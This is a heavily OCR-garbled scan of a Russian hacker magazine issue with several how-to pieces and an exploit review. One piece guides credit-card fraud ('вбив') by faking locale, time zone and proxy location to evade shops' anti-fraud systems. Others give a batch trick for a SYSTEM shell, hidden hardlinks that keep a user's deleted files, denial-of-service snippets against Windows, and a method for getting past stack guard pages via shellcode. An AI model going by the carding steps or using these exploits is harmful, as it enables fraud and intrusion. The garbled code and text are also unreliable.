2. Мы не будем печатать все это в консоли каждый раз, а напишем 
прогу на С++, создающую бэкап всех файлов, находящихся в той же 
папке. 

Подключим необходимые файлы и объявим переменные: 

#іпс1ис!е <ѵ7ІпсІо\л73 . Ъ> 

ШШ2_РІШ_БАТА ш-пРіІеБаба; 

ШШБЬЕ ЪРіІе; 

сЪаг ззРабЬ [МАХ_РАТН] ; 

3. Получим путь до папки, из которой запущена прога, и используем 
его для получения указателя на первый файл: 

СебСиггепбБігесбогу (зізеоб (згРабк) , 32 Раб 1 і) ; 

Ізбгсаб ( згРаббі , " \ \ * . * " ) ; 

ЬРіІе = РіпйРігзбРіІе ( згРабЬ., &тл7ІпРі1еБаба) ; 

4. В цикле для каждого файла создадим собственную команду «бзибі I 
ЬагсНіпк сгеаіе <полное имя ссылки> <полное имя файла>» и выпол- 
ним ее через консоль: 

до { 

сЪаг згРаббщТМР [МАХ_РАТН] ="кагд1іпк сгеабе С : \\Ьаскирз\\ " ; 
Ізбгсаб ( згРабЬ._ТМР , ѵ^іпРіІеБаба . сРіІеЫаше) ; 
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Ів^гсаЬ ( 32РаЫі_ТМР , 

ІзЬгсаЬ ( 52РаЬЬ._ТМР , міпРіІеБаба . сЕіІеЫате) ; 
ЗЪеІІЕхесиііе (0 , "ореп" , "ГзиЦіІ" , 32Раб1і_ТМР / ШЪЬ, ЗМ_НІБЕ) ; 
} ѵ/ііііе (РіпдЫехЦРіІе (ЬРіІе , &ѵ7ІпРі1еБа1:а) ! =0 ) ; 
РіпсІСІозе (ЬРіІе ) ; 

5. Готово. Компилим и наслаждаемся :). 



6. Использовать эту особенность ЫТР5 можно как для создания бэ- 
капа данных весом 0 байт, так и для сохранения файлов незадачли- 
вого пользователя. Ничто не мешает нам заранее сделать ЬагсІ Ііпкв 
и спрятать их в дальний угол винта. Юзер будет думать, что удалил 
файло, однако реально он удалит лишь свои жесткие ссылки. 

Итак, наша цель достигнута, а для более близкого знакомства с ЬагсІ 
Ііпкв я отсылаю тебя к интернету. 




ЗАДАЧА 



Л ПОДГОТОВИТЬ ѴѴШБ0ѴѴ5 для 
ВБИВА В ЗАБУГОРНОМ ШОПЕ. 

РЕШЕНИЕ: 



Я не стану объяснять тебе, «что такое хорошо, 
а что такое плохо». Думаю, ты и сам все 
прекрасно понимаешь. И если уж собрался 
заниматься вбивом или взглянуть на то, как 
это делают другие, значит, наверное, подумал. 
Если ты все еще не до конца уловил смысл 
самого понятия «вбив», то коротко поясню. 
Под вбивом в кардерской среде понимается 
незаконное использование данных о чужих 
кредитных картах с целью оплаты в Сети како- 
го-либо товара или услуги. Данные о картонке 
(кредитке) — это ее номер/дата окончания действия и сѵѵ-код (обычно 
три символа). Естественно, понадобится еще и вся информация на 
кардхолдера (владельца картонки), но на ней мы подробно останав- 
ливаться не будем. Любой уважающий себя интернет-шоп имеет 
собственную систему а нтифрода, направленную на борьбу с суровыми 
русскими кардерами. Очень часто заказ могут залочить лишь из-за 
подозрений в мошенничестве. Факторы, на которые следует обратить 
внимание в первую очередь, перечислены ниже: 




1 . Часовой пояс (регион кардхолдера). 

2. Язык браузера (только ЕЫ). 

3. Операционная система (05 ѴѴіпсІоѵѵз 2000/ХР/ѴізІа). 

4. Язык операционной системы (предпочтительнее Е N ) . 

5. ІР-адрес (регион кардхолдера). 

6. Браузер (рекомендую юзать Ослика). 

Конечно, я перечислил далеко не все нюансы, но эти — самые основ- 
ные. В идеале все пункты должны соответствовать «легенде», то есть 
якобы принадлежать кардхолдеру. Но по опыту могу сказать, что в 
этом деле «никогда не угадаешь, где найдешь, где потеряешь». Одним 
словом, антифрод-системы довольно сильно отличаются друг от друга 
(всем, кроме базовых принципов). Поэтому делаем следующее: 

1. Идем на ѵѵѵѵѵѵ.ѵѵеЬ-Ьаск.ги и выбираем соке, географически совпа- 
дающий с местом жительства кардхолдера. Если у нас есть доступ к 
платным сокс-сервисам, то проблем возникнуть не должно, в против- 
ном случае Гугл поможет нам с паблик-носками. 

2. Запускаем тулзу под названием Кагба Тооіз (она есть на сайте 
журнала и на дисках][за 2007 год) и изменяем часовой пояс/версию 
ОС и т. п . 

3. Запускаем ІЕ и заходим на ѵѵмм.Іеабег.ги/зесигеМбо.бігпІ. . после чего 
смотрим инфу о себе. 

Все перечисленные действия желательно выполнять в англоязычной 
Винде, установленной на ѴМѵѵаге. 




ЗАДАЧА: 



(ДЕКОМПИЛИРОВАТЬ (ВОССТАНОВИТЬ) ИСХОДНЫЙ 
КОД ДВОИЧНОГО СЬА55-ФАЙЛА ПРИЛОЖЕНИЯ, НАПИСАННОГО 
НА.ІАѴА. 

РЕШЕНИЕ: 

Очень часто возникает необходимость включить в свой проект какую- 
либо специфическую функцию, написанную на Оаѵа. На написание ее 
можно потратить немало времени, но если существует продукт, который 
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Результат де компиляции основного сіазз-файла МІР 



выполняетаналогичные требуемым операции, можно позаимствовать 
код оттуда. Тутже возникает вопрос: как это сделать, если исходников в 
открытом доступе нет, а при распаковке бАР-архива баѵа-приложения 
мы видим набор скомпилированных сіазз-файлов? Конечно, необхо- 
димость декомпилирования может возникнуть и в случае, когда требу- 
ется немного изменить функциональность программы. Нам поможет 
программа-декомпилятор Бб 6АѴА БЕСОМРІБЕР, которую можно найти 
на нашем диске или утянуть по ссылке ЬирѴ/сгаскІаЬ.ги/боѵѵпІоаб. 
рЬр?ас!:іоп=ае{&п=ІМБМ1 . 

1 . Устанавливаем программу и запускаем су.ехе. Выбираем пункт 
меню «Рііе -> Ореп» и в окне обзора указываем бАВ-файл приложе- 
ния или *.с1азз-файл (программа поддерживает и другие форматы 
файлов). 

2. Если выбран файл-архив 6АВ, откроется окно встроенного в програм- 
му архиватора, содержащее список входящих в него файлов и краткую 
информацию. Можно либо распаковать содержимое архива в папку, выбрав 
необходимые файлы и нажав на кнопку Ехіхасі, либо открыть нужный файл 
для дальнейшей работы с ним (например, декомпиляции) в программе 

по двойному щелчку. Я попробовал декомпилировать файл мобильного 
100-клиента МІР и понял, что он собран на основе модифицированной 
популярнойтелефонной аськи Л ММ. Ты можешь не поверить своим глазам, 
но выдаваемый декомпилятором код предельно понятен и легокдля чтения! 
В верхнем фрейме окна декомпилятора представлен код обработанного 
сіазз-файла, в нижнем фрейме находится списокфункций, входящих в файл. 
Это оченьудобно: по двойному щелчку по названию функции происходитпе- 
ремещение на ее начало в окне кода. Справа отокна кода находится панель, 
которая позволяетскомпилировать файл, заархивировать файл в 6АВ и даже 
попробовать исполнить код на виртуальной баѵа-машине (для этого, правда, 
необходимо сначала указать путь к необходимым файлам баѵа-машины). 

3. Если требуется изменить функциональность программы, а не просто 
декомпилировать и выдрать кусок кода, то имеетсмысл распаковать 6АВ- 
архив в отдельную директорию. 



► 048 



ХАКЕР 02 /110/ 08 





взлом 



>> 




ЗАДАЧА: 



] ПОЛУЧИТЬ ПРАВА 5Ѵ5ТЕМ В ВИНДЕ, ИМЕЯ НА РУКАХ 

АДМИНСКИЙ ДОСТУП К ОС. 

РЕШЕНИЕ: 



Ни для кого не секрет, что самым верхним уровнем доступа в Винде являет- 
ся гіпд 0 или, как говорят, нулевое кольцо. Асамым низким — права гостя. 
Тем не менее Винда не Линукс, и завидное большинство пользователей в 
повседневной работе сидит из-под админского аккаунта. Чем это грозит и 
что из этого можно извлечь, мы описывали в статье «Один на один». Но по- 
рой одним западлостроением не обойтись, да и права 5У5ТЕМ лишними не 
бывают, тем более что сними открываются поистине рутовые возможности 
в Винде. На самом деле получить такие права в системе не составляет ни- 
какого труда, нужен лишь админский аккаунт и минута свободного времени. 
Итак, приступим: 

1. Создаем батник — файл с расширением ЬаС 
2. Записываем в нем: 



аЬ 01:00 /іпі:егасі:іѵе "стсі" 

3. Смотрим на время, установленное на локальном компе, и меняем в 
батнике значение 01 :00 на нужное нам. То есть если на компе 21 :00,то в 
батнике имеетсмысл указать 21 :01 :). 



ѴЖ 1 1 ч \ ІЛ 1 уі гнягі 



Н гсі= I. ііл: Я&іл Л? І : г 
і С і ІѴ.ч рфиеѵ* < 

сг-.'люоисчл^ыіпгі) 



Я МДІЧ ѴР(Гі>І№! 



І*гГ ЛфЮТДО ЕНІ ОЫ№1 

ЬК'фШЙГГИ* 



ІМ 


І°І-| І’га—і 


г,ігр.ъД Г-." |_ХІ 


ют 


ІКІГьИ 

чД 


Й4ЧИІ»* 




ГИ 




ЕіЧГЕН 




ЬНГіН 


лка ос 


ГЧГЕЦ 


іІЯ 


■ѵчгнн 


пігпі лм 








Фсекгю* 


МГ!И 


Ѵчічпі гт 




іН’ФЙЛ'Д 


чечкѵ* яжс 




ОЗГЕИ 


Г/Фчн™ 




■*■■■■ 






5У5ТЕМ в наших руках : 



4. Запускаем получившийся Ьаі-файл, ждем одну минуту и получаем кон- 
соль с правами 5У5ТЕМ :). 

Кроме того, если перезапустить ехріогег.ехе, то мы сами окажемся в системе 
с правами 5У5ТЕМ. Как использовать эту фишку, думай сам, однако таким 
образом можно несколько доработать варианте лоадером, описанный 
выше. В общем, пробуй и все получится :). 



№8 



ЗАДАЧА: 



|ЗАЩИТИТЬ ИНФОРМАЦИЮ ОТ НЕСАНКЦИОНИРО- 
ВАННОГО ДОСТУПА. 

РЕШЕНИЕ: 

В наше неспокойное время часто приходится пользоваться шифрова- 
нием для защиты приватной информации. Написано много программ, 
использующих надежные, хорошо зарекомендовавшие себя крипто- 
графические алгоритмы и их комбинации, остается только выбрать для 
себя наиболее удобные и безопасные реализации. 
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Криптуем все и вся 



1 . Создание защищенного диска. Программа добавляет свой виртуаль- 
ный диск и блокирует к нему доступ, требуя ввести пароль. Все данные, 
находящиеся на нем, шифруются, а сам виртуальный диск представ- 
ляет собой файл с определенной структурой. Прога виситв процессах 
(часто втрее) и отслеживает работу юзера со своим диском. Во многих 
утилах поддерживается несколько виртуальных устройств. Программа 
СгурІаіпеготСурЬегіх использует вышеописанный принцип и шифрует 
данные алгоритмами ВІоѵѵбзН и АЕ5, задействуя пользовательский 
пароль длиной до 100 символов. 

2. Создание запускаемого шифрованного файла. Утила шифрует 
пользовательские данные и добавляет к ним исполняемый модуль, 
что делает его автономным. Для расшифровки такого файла не нужно 
иметь прогу, которой его шифровали. Достаточно знать пароль. Пре- 
имущество этого метода в том, что твоя инфа перестает 
зависеть от компа, на котором установлена программа 
шифрования. Файл можно взять с собой на флешке, от- 
править по почте и т.д. Пример такой утилы — СірЬегѴѴаІІ 
[ мѵѵѵѵ.сірбегѵѵаІЕсот І. русская бесплатная программа, 
использующая криптографические алгоритмы ВІоѵѵЯзЬ, 
НС4, РС5 и СА5Т-256. 

3. Оченьудобным является шифрование буфера обмена. 
Допустим, нужно сохранить приватность переписки, 
причем и отправитель, и получатель имеют одну и ту же 
прогу. Копируем набранный текст в буфер обмена любым 
привычным способом (<СМ-С>), шифруем, исполь- 
зуя пароль, и вставляем обратно. На выходе получаем 
сплошной бессвязный набор букв и цифр. Получивтакое 
письмо, копируем содержимое, вводим пароль и встав- 
ляем оригинальный текст. Сама прога обычно весит пару 
сотен килобайт и может быть отправлена вместе с пись- 
мом. Как говорится, дешево и сердито. Опробовать такой 
метод можно, запустив СІірЭесиге. Эта бесплатная прога 
поддерживает девять различных алгоритмов шифрова- 
ния и шесть хэширования, полностью настраиваемая, а 
также имеет простой и удобный интерфейс. 

Теперь твои данные будут под надежной (относительно 
надежной. — Прим. РогЬ’а) защитой. ~н~ 
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ОБЗОР эксплойтов 



НОВОГОДНЮЮ НОЧЬ Я ПРОВЕЛ НАЕДИНЕ С САМЫМ БЛИЗКИМ МНЕ СУЩЕСТВОМ — С МОНИТОРОМ. КОВЫРЯЛ 
РАЗНЫЕ ОСИ. И НАКОВЫРЯЛ! В ОДНОМ ТОЛЬКО ЯДРЕ ВИСТЫ ШЕСТЬ ДЫР, БОЛТАЮЩИХСЯ ТАМ СО ВРЕМЕН 
ІМТ. И ПОЛОВИНА КРИТИЧЕСКИХ. И ЭТО БЕЗ УЧЕТА МЕЛКИХ БРЫЗГ В ПРОЧИХ ПРОГРАММНЫХ ПРОДУКТАХ! 
ПОД БОЙ КУРАНТОВ Я РЕАЛИЗОВАЛ ПРИНЦИПИАЛЬНО НОВЫЙ ТИП АТАК НАСТЕККШО-3 (УСЛОВНО НА- 
ЗВАННЫЙ МНОЙ 5ТАСК-СК0550ѴЕР АТТАСК). В ОБЩЕМ, НОВОГОДНИЕ ПРАЗДНИКИ ОКАЗАЛИСЬ НЕОБЫЧАЙ- 
НО ПРОДУКТИВНЫМИ, И ДВА ПОСЛЕДУЮЩИХ ОБЗОРА ЭКСПЛОЙТОВ БЫЛО РЕШЕНО ПОСВЯТИТЬ ОПИСАНИЮ 
БАГОВ, СОБСТВЕННОРУЧНО ОБНАРУЖЕННЫХ МНОЙ. ДЕМОНСТРАЦИОННЫЕ ЭКСПЛОЙТЫ ПРИЛАГАЮТСЯ, А 
ВОТ ЗАПЛАТОК ПОКА ЕЩЕ НЕТ, И НЕИЗВЕСТНО, КОГДАОНИ ВООБЩЕ БУДУТ... 




ѴѴШ00ѴѴ5 

МЕ55А0ЕВЕЕР 

АРІ: 



ОТКАЗ 

В ОБСЛУЖИВАНИИ 



>> Вгіе? 



| Применительно к 
незатейливой системной функции 
МеззадеВеер выражение «Кричи 
хоть до посинения» приобретает 
отнюдь не фигуральный, а вполне 
конкретный смысл, сопровождае- 
мый синим экраном смерти. Но все 
по порядку. Функция МеззадеВеер 
(издающая простой набор 
звуков в стиле ВузІютАзІегізк, 
5уз1:етЕхс1атабоп, Эуз^етНапсІ, 
Зуз^етОиезбоп и ЭузІетОе^аиН:) 
экспортируется динамической 
библиотекой 1)5ЕВ32.0І_І_, при 
дизассемблировании которой мы 




нагрузка ядра при проигрывании 
звуковой очереди, созданной 
многократными вызовами 
МеззадеВеер 



наталкиваемся на тонкую обертку, 
ведущую с прикладного уровня 
вглубь ядра через прерывание 
ІЫТ2ЕИ (ѴѴ2К) или же машинную 
команду 5Ѵ5ЕІЧТЕР (ХР и все пос- 
ледующие системы]. Ядро, в свою 
очередь, перекладываетобработку 
вызова МеззадеВеер на драйвер 
ѴѴІЫ32К.5У5, в котором и сосредо- 
точена львиная доля подсистем 
ІІ5ЕН32 и 60132. Однако сам по себе 
драйвер ѴѴІЫ32К.5У5 не может из- 
давать никаких звуков (ну разве что 



бибикнуть встроенным спикером) и 
потому поручает это дело драйверу 
звуковой карты, ставя соответству- 
ющий музон в очередь и возвращая 
управление до того, какой будет 
проигран. Ну и какая проблема?А 
вот какая: за короткий отрезок вре- 
мени прикладной код может поста- 
вить в очередь на воспроизведение 
сотни тысяч звуков. В результате 
этого мыв лучшем случае получим 
~90%-ную загрузку ядра, продол- 
жающуюся до тех пор, пока вся эта 
симфония не отыграет, а играть она 
будетдолго.такчто семь бед — дави 
«Ресет». Причем никаким путем 
очистить очередь невозможно, и 
звуковая карта будет пил икать даже 
после завершения зловредного 
процесса. Но это еще что! Подума- 
ешь, компьютер тормозит какас- 
фальтный каток. Достаточно многие 
драйверы звуковых карт содержат 
ошибки, приводящие квыпадению 
в В5СЮ со всеми вытекающими 
отсюда последствиями. 



>> ТагдеізІ 



N1, ѴѴ2К, ХР, Бегѵег 2003, Зегѵег 
2008, Виста. 



>> Ехріоід 



Исходный код эксплойта прост до 
безобразия и состоит фактически из 
одной строки: 

бог ( іпі: а = 0; а 

< 966666666; а++) 
МеззадеВеер ( 0 ) ; 

Естественно, если вызывать 
МеззадеВеер из разных потоков, то 
дело пойдет быстрее и вероятность 
выпадения в В500 многократно 



возрастет, причем эта атака может 
быть реализована не только локаль- 
но, но и через скриптовые языки, 
поддерживаемые браузерами. 



>> Зоіиііоп 



Я не сообщал об этой проблеме 
МісгобоК, так что официальная 
позиция последней по рассматри- 
ваемому вопросу отсутствует. Лично 
я просто пропатчил код функции 
МеззадеВеер, воткнув перед 
выходом вызов 51еер(69), выдержи- 
вающий паузу в 69 мс и только потом 
возвращающийуправление. На 
нормальной работе системы это об- 
стоятельство никак не отражается, 
а вот забить очередь зловредному 
коду уже не удастся. 

ЗЕТиКІНАМО 
ЬЕОЕХСЕРТІ 
ОМРІ1.ТЕК: 

СГ5ЮЫ В 1)6 



>> Вгіе* 



псІІесІЕхсерЛопРіиег, экспорти- 
руемая динамической библио- 
текой КЕНЫЕЕ32.0ЕЕ, позволяет 
процессу устанавливать фильтр 
необрабатываемых структурных 
исключений, заменяющий собой 



системный фильтр, завершаю- 
щий приложение в аварийном 
режиме с предсмертной надписью: 
«Программа совершила недопус- 
тимую операцию». Архитектурно 
ВеШпЬапсІІесІЕхсерІіопРіиег 
относится ко всему процессу в 
целом, но конструктивно обработ- 
чик вызывается в контексте потока, 
возбудившего исключение, что 
требует определенного количества 
стековой памяти. Если же свобод- 
ного стекового пространства нет, 
то вместо ожидаемой генерации 
ЕХС Е РТ I О І\І_5ТАС К_0 ѴЕ Р Р Ю ѴѴ 
процессор возбуждает исключение 
ЕХСЕРТІ0М_АССЕ55_ѴІ0ЕАТІ0Ы. 
Это совсем неудивительно, так как 
сегмент стека занимает все ад- 
ресное пространство и реальное 
переполнение стека происходит 
только тогда, когда Е5Р вплот- 
ную приближается к нулевому 
адресу. Но поскольку первые 
64 Кб адресного пространства в 
ЫТ зарезервированы для отлова 
нулевых указателей, такая ситуация 
никогда не случается, и операци- 
онная система лишь эмулирует 
ЕХС Е РТ I О Ы_5ТАС К_0 V ЕРРЮѴѴ. 
Всякий раз, когда процессор 
генерирует ошибку доступа к памяти 
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взлом 




ОИуОеЬиддег считает, что исключение произошло по адресу ОООЗОРРСЬ, в 
то время какпростейший отладчик, написанный за пять минут на базе М3 
ОеЬиддіпд АРІ, говорит, что подлинный адрес исключения — ОООЗЮООЬ 



(ЕХСЕРТІ0М_АССЕ55_ѴІ0І_АТІ0І\І), 
ядро смотрит, выходитли стек 
потока за отведенный ему регион 
памяти (а поумолчанию потоку 
выделяется 1 Мб), и если да, то об- 
работчику исключений передается 
код ЕХС Е РТІ О Ы_5ТАС К_ОѴЕР Р1_0 ѴѴ, 
который вместе с прочими пара- 
метрами кладется в стек! Ріо ведь 
стека у нас уже нет, так? И какже мы 
можем туда что-то положить? 
Анализ показывает, что 
ЕХС Е РТ I О І\І_5ТАС К_0 V Е Р Р І_0 ѴѴ 
генерируется, когда в резерве 
останется чуть менеетрех страниц 
(12 Кб) стекового пространства, что 
вполне достаточно для большин- 
ства целей. Ріо вот если стека 
действительно нет, то никакой 
прикладной обработчикне вызы- 
вается (включая системный) и ядру 
ничего не остается, кроме какза- 
вершить процесс (именно процесс, 
а не поток) без каких бы то ни было 
сообщений и уведомлений. 

Как это можно использовать для 
атаки? Очень просто: внедряемся в 
процесс, сбрасываем Е5Р в ноль и 
все. Процесс умирает. То же самое 
происходит при создании в нем 
удаленного потока АРІ-функцией 
СгеаЮРетоІеТЬгеасІ. 

Воттут некоторые могут спросить: 
а зачем так извращаться? Если 
мы можем внедриться в процесс- 
жертву, достаточно вызывать 
АРІ-функцию ТегтіпаІеРгосезз 
и все! Ан нет. У процесса легко 
отобрать право завершать себя; 
прикладные функции ЕхііРгосезз/ 
ТегтіпаЮРгосезз защитному меха- 
низмулегко перехватить; наконец, 
«легальная» смерть процесса 
элементарно «документируется» 
путем рассылки широковеща- 
тельных сообщений, подхваты- 
ваемыхтеневым процессом для 
перезапуска текущего. Именнотак 
антивирусы и брандмауэры сража- 
ются с малварью. Но вотсброс Е5Р 
в ноль при первом же обращении 
к стеку порождает исключение, 



после которого не может быть 
выполнена ни одна АРІ-функция 
прикладного уровня. 



|>> Тагдеі| 



ЫТ, ѴѴ2К, ХР, 5егѵег2003, Бегѵег 
2008, Виста. 



|>> ЕхрІоиі| 



Ядро эксплойта, срубающего любой 
процесс при внедрении в него, 
выглядит так: «азт{хог езр, езр};». 



>> Зоіиііоп 



Решения описываемой проблемы, 
по- видимому, не существует, но есть 
некий ѵѵогкагоипсі — все критиче- 
ские процессы запускать из под 
отладочного процесса и мониторить 
его состояние. Процесс-отладчик 
получает исключение ЕХСЕРТІОЫ_ 
АССЕ55_ѴІ0І_АТІ0Ы до завершения 
отлаживаемого процесса, что 
позволяет разрулить ситуацию и 
продолжить нормальное выпол- 
нение. Впрочем, отладчики типа 
ОНуйеЬиддег на это неспособны, и 
в настоящий моментя пишу свою 
собственную утилиту для отражения 
возможных атак. 



01І.У0ЕВІІССЕР: 

и ѢшЭ НЕВЕРНОЕ 

ОПРЕДЕЛЕНИЕ 

АДРЕСАПАДЕНИЯ 



>> Вгіе? 



(ОЦуОеЬиддег, ставший 
де-факто стандартным отладчиком 
гіпд-3, широко используется не 
только для взлома программ, но и 
для их отладки. Нуда, ведь это же 
отладчик, а нелом :). А отлаживать 
приходится в том числе и про- 
граммы, находящиеся в состоянии 
клинической смерти (то есть после 
критического сбоя). Естественно, 
при этом мы неявно постулируем, 
что сам отладчик работает правиль- 
но и выдает достоверную информа- 
цию. К сожалению, ОЦуБебиддег 1.10 
содержит ряд ошибок, и вот одна из них. 
Когда стековое пространство 



реально заканчивается (на 
самом делетам остается еще одна 
страница с атрибутами, выстав- 
ленными поумолчанию в РА6Е_ 
Ы0АССЕ55), система генерирует 
ЕХСЕРТЮЫ ^\ССЕ55^/І0І_АТЮІ\І по 
адресу ОООЗЮООЬ (в однопоточной 
программе, скомпилированной М5 
ѴС 6.0 с настройками поумолча- 
нию и без рандомизации стекового 
пространства, впервые появившей- 
ся в Висте). Однако ОНуОеЬиддег, 
перепутав Іхар с {аиІРом, выносит 
неверное суждение и сообщает об 
ошибке доступа по адресу ОООЗОРРСЬ 
(при условии, что запись в стек 
производится командой РІІ5РЮ). 
Последствия — весь анализ летит 
к черту и хакер не понимает, откуда 
тут взялось ОООЗОРРСЬ, когда по 
всему ведь должно быть ОООЗЮООЬ. 
Но хакер — это ладно. Наступит 
пару раз на грабли и образумится. С 
реанимационными скриптами все 
намного сложнее. 

Еще несколько лет назад я опуб- 
ликовал в «Системном админис- 
траторе» статью «Практические 
советы по восстановлению системы 
в боевых условиях», где рассказал 
отом, как написать собственный 
обработчик критических ошибок, 
восстанавливающий работоспособ- 
ность программы и возвращающий 
ее в более или менее стабильное 
состояние, которое как минимум 
позволяло бы сохранить все не- 
сохраненные данные (текст самой 
статьи можно бесплатно скачать с 
моего сервера: ЬНр://пе 2 иті.ога. 
ги/ю-сіедіиск.гір ). В качестве ос- 
новного движка сначала использо- 
вался отладчик (сперва М5 ѴѴіпОЬд, 
затем ОИу), и оказалось, что в неко- 
торых ситуациях ОИу спотыкается 
и программа падаетокончательно, 
поэтому пришлось возвращать- 
ся к М5 ѴѴіпОЬд, который, кстати 
говоря, за последние несколько 
лет резко поумнел и превратился 
в достойный инструменте хорошо 
документированным интерфейсом 
расширений. 



|>> Тагдеі| 



ОНуОеЬиддег 1 .1 0/2.00. 



>> Ехріоіі 



ізш{гоо1: ризЬ еах/;ітр 
гооі} 



>> Боіиііоп 



Я написал автору ОІІуОеЬиддег’а 
письмо с описанием ошибки, но 
ответа так и не получил. Что ж, будем 
ждать. 

новый тип 

АТАК НА СТЕК 



До сих пор хакеры переполня- 
ли стек в одном направлении 
— вперед и вниз, то есть в область 
старших адресов (чтобы не 
возникло путаницы, условимся, 
что стек растет вверх). Индексное 
переполнение (с перезаписью 
произвольной ячейки памяти) 
встречалось намного реже. Но 
никто (или практически никто) еще 
не переполнял стек назад и вверх! 
Беглый анализ, выполненный 
мной в новогоднюю ночь, выявил 
большое количество приложений, 
подверженныхугрозе подобного 
типа, от которой никто из програм- 
мистов даже и не пытался защи- 
щаться (действительно, сложно 
защищаться оттого, чего не 
знаешь). Начнем с азов, то есть с 
документированных, но малоизве- 
стных особенностей организации 
стековой памяти. При создании 
нового потока система создает и 
новый стек, резервируя (МЕМ_ 
РЕ5ЕРѴЕ) необходимое количест- 
во страниц памяти (по умолчанию 
1 Мб, но эта величина может быть 
изменена параметром сІѵѵБіаскБіге 
АРІ-функции СгеаІеТЬгеасІ, а раз- 
мер первичного стека, создавае- 
мого при старте процесса, берется 
из заголовка РЕ-файла и может 
меняться линкером). 

На дно стека ложится, выражаясь 
в терминах ОЕС, так называемая 
«желтая сторожевая страни- 
ца» (уеііоѵѵ диагсі раде), или в 
терминологии Місгозо^ просто 
РА6Е_61ІАР0. Это выделенная 
(МЕМ_СОММІТ) страница памяти 
с атрибутами (РАѲЕ_РЕАОѴѴРІТЕ 
I РА6Е_ѲІІАР0). При первом 
обращении к ней генерируется ис- 
ключение 8ТАТІ)5_61ІАР0_РА6Е_ 
V I О Б АТ I О N , перехватываемое 
системой, которая снимает атрибут 
РА6Е_61ІАР0 с текущей страницы, 
выделяет следующую страницу 
памяти и назначаетее стороже- 
вой путем присвоения атрибута 
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РА6Е_61ІАР0. Таким образом, по мере роста стека сторожевая страница 
перемещается наверх, а стеку выделяется все больше и больше памяти. 
Это достаточно известный факт, описанный в М5ЭЫ. А вот что в М50Ы не 
описано, так это то, что сразу же при создании стека в непосредственной 
близости от его вершины размещается (опять-таки выражаясь в терми- 
нах Э ЕС) «красная сторожевая страница» (геб диагб раде), за которой 
идет выделенная страница памяти с атрибутами РА6Е_РЕА0ѴѴВІТЕ, и 
уже на самой вершине стека располагается страница РА6Е_Ы0АССЕ55. 

В результате этого фактический размер стека на три страницы (12 Кб) 
меньше обозначенного. 

При достижении красной сторожевой страницы генерируется исклю- 
чение ЕХСЕРТЮМ_5ТАСК_0ѴЕРРІ_0ѴѴ. Л ибо оно обрабатывается 5ЕН- 
обработчиком, назначенным программистом, либо управление получает 
фильтр исключений верхнего уровня, принудительно завершающий 
работу приложения с выдачей ругательного сообщения известного типа. 
В распоряжении 5ЕН-обработчика имеется две страницы свободного 
стекового пространства, что позволяет ему корректно обработать 
ситуацию. 

Проблема втом, что ни М50ІЧ, ни популярные книги по программиро- 
ванию не говорят, что именно нужно делать, и 99,9% программистов 
допускают одну и ту же фатальную ошибку. Предположим, что в нашей 
программе имеется рекурсивная функция, которая при определенных 
обстоятельствах может съесть весь стек целиком (на приложениях С++ 
такое часто случается). Когда желтая сторожевая страница докаты- 
вается до красной, генерируется исключение ЕХСЕРТІ0М_5ТАСК_ 
ОѴЕРРІ_ОѴѴ, но при этом красная сторожевая страница становится 
«зеленой», то есть лишенной каких бы то ни было защитных атрибутов. 
Если программистустанавливает фильтр, отлавливающий ЕХСЕРТЮЫ_ 
5ТАСК_0ѴЕРРІ_0ѴѴ и, например, завершающий рекурсивную 
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функцию с тем или иным кодом ошибки, то... все «как бы» работает, 
но при повторном возникновении аналогичной ситуации красная 
сторожевая страница уже будет отсутствовать и при достижении пре- 
дыдущего барьера исключение ЕХСЕРТІ0М_5ТАСК_0ѴЕВРІ_0\/Ѵ уже 
не будет генерироваться. Рекурсивная функция продолжит испол- 
няться и дальше, отъедая одну страницу за другой. А вот когда она со 
всего маху врежется в последнюю стековую страницу (в ту, которая с 
атрибутами РАѲЕ_[\І0АССЕ55), процессор сгенерирует исключение 
ЕХСЕРТ10Ы_АССЕ55_\/1С)1_АТ10М и передаст его ядру. Ядро увидит, что 
стек исчерпан и передавать управление ЭЕРІ-обработчику нет никакой 
возможности, поскольку он сам нуждается в стеке, а стека-то нет. В 
результате произойдеттихая смерть процесса на ядерном уровне без 
передачи управления на гіпд-3. 

Естественно, это несколько упрощенная схема, но если мы можем 
вызывать переполнение стека тем или иным образом (например, ре- 
курсивным запросом), то в первый раз произойдет исключение, более 
или менее корректно обрабатываемое программой, а вот во второй раз 
программа склеитласты. Хороший способ для реализации атаки на 
отказ в обслуживании. 

Атеперь задумаемся: зачем Місгобоіі застолбила последнюю 
стековую страницу, выставив ее в РА6Е_І\І0АССЕ55?! Ответ: вот 
для пионеров и застолбила, в противном случае при повторном 
переполнении стека (когда красной сторожевой страницы уже 
нет) программа вылетела бы за его пределы и пошла бы «че- 
сать» совершенно посторонние данные, никоим образом ей не 
принадлежащие. Воттакой, значит, механизм защиты стека от 
переполнения мы имеем в ѴѴіпсІоѵѵз-системах. Чисто программ- 
ный и совсем не аппаратный. Почему не аппаратный? Так ведь 
тогда на стек каждого потока ядру пришлось бы заводить свой 
собственный селектор, а их количество в х86 небезгранично и 
намного меньше, чем потоков в средненагруженной системе. К 
тому же адресовать локальные переменные пришлось бы через 
префикс 55 — прощай, плоская модель памяти, и здравствуйте, 
тормоза ! 

К нашему хакерскому счастью (и большому программистскому не- 
счастью), программную защиту легко одолеть. Для этого достаточно 
вызывать из 5ЬеІІ-кода АРІ -функцию ѴігІиаІАІІос, присвоив последней 
странице стека статус МЕМ_С0ММ1Т. А если еще сбросить атрибут 
РА0Е_61)АР0 у красной сторожевой страницы (что можно сделать 
вызовом ѴИиаІРгоІесІ:), то совсем хорошо. Аналогичного результата 
можно добиться, просто перезаписав адрес возврата из функции с 
переполняющимся буфером указателем на АРІ-функции ѴИиаІАІІос/ 
ѴігІиаІРгоіесІ, передав им атрибуты через стек. Это работает на систе- 
мах с неисполняемым стеком (ХР 5Р2 с аппаратной поддержкой йЕР), 
но, увы, на Висте из-за рандомизации адресного пространства прихо- 
дится искать более изощренные пути. 
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Результат работы программы Еіаск/Неар АНосабоп зігаіедізі, демон- 
стрирующей стратегию выделения памяти для стека/кучи и обход 
программной защиты отпереполненияД 



В результате при переполнении стека (например, все той же ре- 
курсивной функцией) исключение вообще не возникаети начи- 
нают затираться чужие данные, и вот тут-то и начинается самое 
интересное — кому эти данные принадлежат? Стек главного потока 
на ЫТ размещается в младших адресах перед страничным образом 
исполняемого файла, и вершина стека смотрит в пустую область, 
где и затирать-то нечего. Но вот стеки второго и всех последую- 
щих потоков, как правило, размещаются следом за страничным 
образом, и потому при переполнении стека мы ударяем в конец ис- 
полняемого файла, нанося ему тяжелые телесные повреждения. В 
